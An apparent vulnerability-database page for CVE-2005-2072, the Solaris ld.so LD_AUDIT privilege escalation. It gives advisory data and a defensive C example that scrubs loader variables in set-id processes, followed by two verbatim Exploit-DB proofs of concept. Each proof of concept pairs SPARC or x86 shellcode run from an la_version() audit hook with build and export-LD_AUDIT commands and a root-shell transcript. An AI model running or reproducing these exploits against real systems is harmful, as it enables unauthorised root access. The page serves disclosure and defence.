CVE-2005-2072
Published 2005-06-29
Priority: P4
Severity: high (CVSS 2.0 base score 7.2)
CVSS 2.0 vector: AV:L/AC:L/Au:N/C:C/I:C/A:C
Public exploit: yes
EPSS: 1.00% (58.4th percentile)
The runtime linker (ld.so) in Solaris 8, 9, and 10 trusts the LD_AUDIT environment variable in setuid or setgid programs, which allows local users to gain privileges by (1) modifying LD_AUDIT to reference malicious code and possibly (2) using a long value for LD_AUDIT.
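The description above states what went wrong: ld.so acted on LD_AUDIT even when the process was running set-uid or set-gid, so the unprivileged caller chose which object was mapped into a privileged process. The following example is added here and is not Sun's ld.so source or any of the exploits on this page. It models the secure-mode check a runtime linker has to make: when the process is set-id, drop every environment variable that lets the caller steer object loading (LD_AUDIT alongside LD_PRELOAD and LD_LIBRARY_PATH, plus their Solaris _32/_64 forms) before the linker reads it. The variable list, function names and the sample environment are illustrative assumptions; a real linker takes the set-id signal from the kernel (AT_SECURE / issetugid()) rather than by comparing ids as the stand-in here does.

```c
/* Added example (not Sun's ld.so source): a model of the secure-mode check a
 * runtime linker has to make. When the process is set-uid or set-gid, any
 * environment variable that lets the caller choose which objects get loaded
 * (LD_AUDIT, LD_PRELOAD, LD_LIBRARY_PATH and their Solaris _32/_64 forms) is
 * dropped before the linker looks at it. CVE-2005-2072 is the case of
 * LD_AUDIT being missing from that list. The variable list is illustrative. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

static const char *const unsafe_vars[] = {
    "LD_AUDIT", "LD_PRELOAD", "LD_LIBRARY_PATH", NULL
};

/* Return 1 if the "NAME=value" entry names a variable that a set-id process
 * must ignore. The name is matched exactly (up to '='), plus the _32/_64
 * suffixed variants, so "LD_AUDIT_FOO" does not match. */
int is_unsafe_ld_var(const char *entry)
{
    const char *eq = strchr(entry, '=');
    size_t n = eq ? (size_t)(eq - entry) : strlen(entry);

    for (const char *const *v = unsafe_vars; *v; ++v) {
        size_t vl = strlen(*v);
        if (n < vl || memcmp(entry, *v, vl) != 0)
            continue;
        if (n == vl)
            return 1;
        if (n == vl + 3 &&
            (memcmp(entry + vl, "_32", 3) == 0 ||
             memcmp(entry + vl, "_64", 3) == 0))
            return 1;
    }
    return 0;
}

/* Remove unsafe entries from envp in place when `secure` is non-zero.
 * Returns the number of entries dropped; a non-set-id process (secure == 0)
 * keeps its environment untouched, which is the normal behaviour. */
size_t scrub_ld_env(char **envp, int secure)
{
    size_t removed = 0, w = 0;
    if (!secure)
        return 0;
    for (size_t r = 0; envp[r]; ++r) {
        if (is_unsafe_ld_var(envp[r])) {
            removed++;
            continue;
        }
        envp[w++] = envp[r];
    }
    envp[w] = NULL;
    return removed;
}

/* A real linker gets this flag from the kernel (AT_SECURE / issetugid());
 * comparing real and effective ids is the portable stand-in used here. */
int running_setid(void)
{
    return getuid() != geteuid() || getgid() != getegid();
}

/* Constructed sample environment mirroring the exploit session on this page. */
#define SAMPLE_ENV { "PATH=/usr/bin:/bin", "LD_AUDIT=/tmp/dupa.so", \
                     "LD_PRELOAD_32=/tmp/x.so", "HOME=/home/student", NULL }

/* Scrub the sample environment with the given secure flag and return how
 * many entries were dropped: 2 in secure mode, 0 otherwise. */
size_t demo_scrub_count(int secure)
{
    char *env[] = SAMPLE_ENV;
    return scrub_ld_env(env, secure);
}

/* After a secure scrub only PATH and HOME remain, in their original order. */
int demo_scrub_keeps_safe(void)
{
    char *env[] = SAMPLE_ENV;
    scrub_ld_env(env, 1);
    return env[0] && strcmp(env[0], "PATH=/usr/bin:/bin") == 0 &&
           env[1] && strcmp(env[1], "HOME=/home/student") == 0 &&
           env[2] == NULL;
}

int main(void)
{
    char *env[] = SAMPLE_ENV;
    /* Force secure mode for the demo; a linker would pass running_setid(). */
    size_t n = scrub_ld_env(env, 1);
    printf("dropped %zu entries; remaining:\n", n);
    for (char **e = env; *e; ++e)
        printf("  %s\n", *e);
    return 0;
}
```

The match is on the exact variable name, not a prefix: a prefix test would also reject harmless names such as LD_AUDIT_FOO, while an exact list that forgets one name (as ld.so did with LD_AUDIT) leaves the hole open. Either way, the scrub has to happen before the linker acts on the environment, not after the audit object has already been mapped.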
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | solaris | — | — |
| sun | sunos | — | — |
No detection rules found.
Exploit-DB: Solaris 9/10 - 'ld.so' Local Privilege Escalation (2)
exploitdb · 2005-06-28 · CVE-2005-2072
---
/*
 * Solaris 9 on SPARC. The shared object is mapped by ld.so through
 * LD_AUDIT into the set-uid target (here ping); ld.so then calls
 * la_version() as the first audit entry point, which is where the
 * payload runs.
 *
 * $ cat dupa.c
 */
char sh[] =
/* setuid(0): %o0 = 0, %g1 = 0x17 (setuid), ta 8 */
"\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08"
/* execve("/bin/ksh", ...): %g1 = 0x0b (execve), ta 8 */
"\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x03\xe0\x20"
"\x92\x02\x20\x10\xc0\x22\x20\x08\xd0\x22\x20\x10\xc0\x22\x20\x14"
"\x82\x10\x20\x0b\x91\xd0\x20\x08/bin/ksh";

/* Audit interface entry point called by ld.so as soon as the object is
 * loaded. Jumps into the shellcode; the return value (the audit interface
 * version this library claims to support) is only reached if the payload
 * fails to exec. */
int la_version() {
    void (*f)();
    f = (void*)sh;
    f();
    return 3;
}
/*
$ gcc -fPIC -shared -o /tmp/dupa.so dupa.c
$ export LD_AUDIT=/tmp/dupa.so
$ ping
# id
uid=0(root) gid=100(student)
*/
// milw0rm.com [2005-06-28]
Exploit-DB: Solaris 9/10 - 'ld.so' Local Privilege Escalation (1)
exploitdb · 2005-06-28 · CVE-2005-2072
---
/*
 * Works on:
 * - SunOS 5.10 Generic i86pc i386 i86pc
 * - SunOS 5.9 Generic_112233-12 sun4u
 * It does NOT work on:
 * - SunOS 5.8 Generic_117350-02 sun4u sparc
 *
 * Example on unpatched Solaris 10 (AMD64):
 * atari:venglin:~> cat dupa.c
 */
/* x86 (32-bit) payload: setuid(0), then execve("/bin/sh"), both issued
 * through the Solaris/x86 lcall system-call gate that the first bytes
 * patch into place. */
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xff";

/* Audit interface entry point called by ld.so as soon as the object is
 * loaded through LD_AUDIT, i.e. inside the set-uid target (here su).
 * Jumps into the shellcode; the return value (the audit interface version
 * this library claims to support) is only reached if the payload fails. */
int la_version() {
    void (*f)();
    f = (void*)sh;
    f();
    return 3;
}
/*
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(
*/
No writeups or analysis indexed.
References
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034730.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034731.html
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-June/034738.html
- http://secunia.com/advisories/15841
- http://securitytracker.com/id?1014537
- http://sunsolve.sun.com/search/document.do?assetkey=1-26-101794-1
- http://www.opensolaris.org/jive/thread.jspa?messageID=3497
- http://www.securityfocus.com/bid/14074
- http://www.vupen.com/english/advisories/2005/0908